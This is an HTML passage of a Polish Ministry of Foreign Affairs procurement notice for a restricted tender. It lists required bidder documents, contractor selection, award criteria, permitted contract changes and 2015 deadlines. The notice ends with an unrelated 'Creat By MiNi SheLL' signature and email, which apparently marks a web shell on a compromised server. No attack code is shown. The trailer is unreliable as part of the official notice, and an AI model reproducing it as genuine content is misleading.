2. Pełnomocnictwo do podpisania wniosku o dopuszczenie do udziału w postępowaniu złożone w oryginale lub kopii potwierdzonej notarialnie (tylko w przypadku, gdy wniosek podpisują osoby, których upoważnienie do reprezentowania wykonawcy nie wynika z dokumentów rejestrowych załączonych do wniosku); 
3. W przypadku, gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, złożone w oryginale. Dokumentem potwierdzającym dysponowanie zasobami podmiotu trzeciego będzie każdy dokument, z którego wynikać będzie zobowiązanie takiego podmiotu do udziału w realizacji zamówienia w stopniu niezbędnym dla należytego wykonania zamówienia (np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy itd.), złożony w oryginale; 
4. W celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do zasobu tego (tych) podmiotu(ów), Zamawiający żąda złożenia dokumentów dotyczących 
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, o ile powyższe informacje nie wynikają z dokumentów dołączonych do wniosku na potwierdzenie spełniania warunków udziału w postępowaniu, w tym z dokumentu, o którym mowa w pkt III.6)3 ogłoszenia o zamówieniu; 
5. Dokumenty, o których mowa w pkt III.3.2), III.3.3), 3.3.4), III.4.1), III.4.2), III.4.3.1), III.4.4) należy przedstawić w formie oryginału (dokument opisany w pkt III.4.1) oświadczenie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o spełnianiu warunków udziału w postępowaniu, III.4.4) tylko w tej formie) lub kopii potwierdzonej za zgodność z oryginałem przez osoby upoważnione do reprezentowania Wykonawcy. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów dotyczących Wykonawcy należy poświadczyć za zgodność z oryginałem przez Wykonawcę; 
6. W przypadku wniosku składanego przez Wykonawców wspólnie ubiegających się u udzielenie zamówienia, dokumenty wymienione w pkt III.4.2), III.4.3.1), III.4.4) ogłoszenia o zamówieniu składa każdy z Wykonawców oddzielnie. Pozostałe dokumenty mogą być przedstawione przez jednego Wykonawcę lub wspólnie. W przypadku Wykonawców występujących wspólnie na podstawie art. 23 ust. 1 ustawy mogą oni wspólnie spełniać warunki, o których mowa w art. 22 ust. 1 pkt 1-4 ustawy Prawo zamówień publicznych. Jednocześnie każdy z Wykonawców musi samodzielnie wykazać brak podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy i ust. 2 pkt 5) ustawy Prawo zamówień publicznych. 
7. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, do wniosku musi być załączony dokument ustanawiający pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w formie oryginału lub kopii potwierdzonej notarialnie; 
8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zastosowanie mają przepisy rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz formy, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231); 
9. Wymagane niniejszym ogłoszeniem dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 
10. Najpóźniej do dnia zawarcia umowy Wykonawca przedstawi Zamawiającemu do wglądu wymagane uprawnienia dla osób, które będą wykonywać przedmiot zamówienia wskazane w wykazie osób, o którym mowa w pkt. III.4.1) ogłoszenia o zamówieniu (zgodnie z wymaganiami o których mowa w pkt III.3.4) ogłoszenia o zamówieniu)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Zamawiający przewiduje, że po rozpatrzeniu wniosków o dopuszczenie do udziału w postępowaniu, zaproszenie do składania ofert zostanie przekazane maksymalnie 5 Wykonawcom. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa, niż 5 , Zamawiający zaprosi do złożenia ofert Wykonawców wyłonionych w sposób obiektywny i niedyskryminacyjny, tj. Wykonawców którzy otrzymają najwyższą ocenę punktową spełniania tych warunków. Ocenie punktowej podlegać będzie doświadczenie Wykonawców w realizacji zamówień odpowiadających swoim rodzajem i wartością przedmiotowi zamówienia niniejszego postępowania, spełniających wymagania określone przez Zamawiającego, na podstawie wykazu wykonanych w ciągu ostatnich trzech lat głównych usług potwierdzonych odpowiednimi dowodami, że zostały one wykonane należycie. Za każdą dodatkową usługę, ponad wymagane dwie główne usługi, spełniającą warunki podane przez Zamawiającego  w pkt III.3.2) Wiedza i doświadczenie - Opis sposobu dokonywania oceny spełniania tego warunku, Zamawiający przyzna po 1 punkcie. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu  będzie mniejsza niż 5. Zamawiający zaprosi do złożenia ofert wszystkich wykonawców spełniających te warunki.

Ocenie punktowej nie będzie podlegać wiedza i doświadczenie innych podmiotów udostępnione wykonawcy na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych.

Dokumenty dotyczące wiedzy i doświadczenia złożone w wyniku uzupełnienia na wezwanie Zamawiającego w celu wykazania spełniania warunku udziału w postępowaniu, nie będą powodować przyznania punktacji służącej do określenia listy wykonawców najlepiej spełniających warunek w zakresie wiedzy i doświadczenia.

Zamawiający nie będzie wzywał wykonawców w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych do uzupełnienia dokumentów dotyczących wiedzy i doświadczenia podlegających ocenie punktowej.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Skrócenie terminu realizacji Etapu III do maksymalnie 55 dni do daty zatwierdzenia  przez Zamawiającego wielobranżowego projektu budowlanego - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana umowy w stosunku do treści oferty złożonej przez Wykonawcę w trakcie postępowania o udzielenia zamówienia publicznego obejmującego przedmiot umowy dopuszczalna jest jedynie w następujących przypadkach i zakresie: 
1) w przypadku zmiany stawki VAT dopuszcza się możliwość zmiany umowy w zakresie kwoty VAT i kwoty wynagrodzenia brutto; 
2) w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę w zakresie wynagrodzenia należnego Wykonawcy - jeżeli zmiana ta będzie miała wpływ na koszt wykonania zamówienia przez Wykonawcę;
3) w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu  lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiana ta będzie miała wpływ na koszt wykonania zamówienia przez Wykonawcę;
4) w przypadku, innej niż wskazana w pkt IV.3) 1. 1)-3) powyżej, zmiany powszechnie obowiązujących przepisów prawa dopuszcza się możliwość zmiany tych postanowień umowy, na które zmiana powszechnie obowiązujących przepisów prawa ma wpływ;
5) w przypadku nie dojścia, z przyczyn niezależnych od Wykonawcy, do skutecznego wyłonienia wykonawcy robót budowlanych w postępowaniu o udzielenie zamówienia publicznego, w ramach którego Wykonawca realizował czynności Etapu IV - w zakresie zmiany terminu wypłaty wynagrodzenia, o którym mowa w § 7 ust. 1 pkt 2 Istotnych Postanowień Umowy w celu uregulowania należności z tytułu wykonanej w tym zakresie pracy; 
6) dopuszcza się zmianę terminów wykonania umowy w stosunku do terminów pierwotnie zakładanych, jeżeli terminy te nie będą dotrzymane z przyczyn niezależnych od Wykonawcy. W tym zakresie dopuszcza się również zmianę sposobu i terminów płatności wynagrodzenia, szczególnie w odniesieniu do wynagrodzenia za etap V umowy;
7) w przypadku zaistnienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z terminem określonym w umowie -  dopuszcza się zmianę terminu końcowego realizacji umowy, nie dłużej jednak niż o czas trwania tych okoliczności.
2. Warunkiem wprowadzenia zmian zawartej umowy jest sporządzenie podpisanego przez Strony protokołu konieczności, określającego przyczynę zmiany oraz potwierdzającego wystąpienie, co najmniej jednej okoliczności z wymienionych w pkt IV.3) 1. niniejszego ogłoszenia. Protokół konieczności będzie załącznikiem do aneksu. Ponadto, w przypadku wystąpienia okoliczności, o których mowa w pkt IV.3) 1. 2) i 3) niniejszego ogłoszenia oraz żądania przez Wykonawcę stosownej zmiany wynagrodzenia, Wykonawca zobowiązany jest pisemnie przedstawić do akceptacji Zamawiającego szczegółowe wyliczenia wynikające z tych okoliczności wraz z opisem ich wpływu na koszty wykonania zamówienia przez Wykonawcę.
3. Zmiany umowy, w rozumieniu art. 144 ustawy - Prawo zamówień publicznych, nie stanowią:
1) zmiana wskazanych w umowie osób nadzorujących realizację przedmiotu umowy;
2) zmiana danych teleadresowych Stron;
3) zmiana danych rejestrowych Stron.
4. W przypadkach określonych w pkt IV.3) 3. niniejszego ogłoszenia, dla skuteczności zmiany wystarczające jest niezwłoczne poinformowanie drugiej Strony na piśmie o zaistniałej zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2015 godzina 09:30, miejsce: Ministerstwo Spraw Zagranicznych, 00-580 Warszawa al. J.Ch.Szucha 21 - Dziennik Podawczy lub przesłać za pośrednictwem kuriera lub poczty na adres: 00-580 Warszawa, al. J.Ch.Szucha 23.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Termin wykonania zamówienia wynosi 48 miesięcy, w tym: 1.1. Etap I - do 60 dni od daty zwarcia umowy, 1.2. Etap II - do 120 dni od daty odbioru przez Zamawiającego prac z zakresu Etapu I, 1.3. Etap III - do 60 dni od daty zatwierdzenia przez Zamawiającego wielobranżowego projektu budowlanego, 1.4. Etap IV - do 48 miesięcy od daty podpisania umowy, 1.5. Etap V - do 48 miesięcy od daty podpisania umowy. 2. Zamawiający przewiduje zastosowanie prawa opcji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com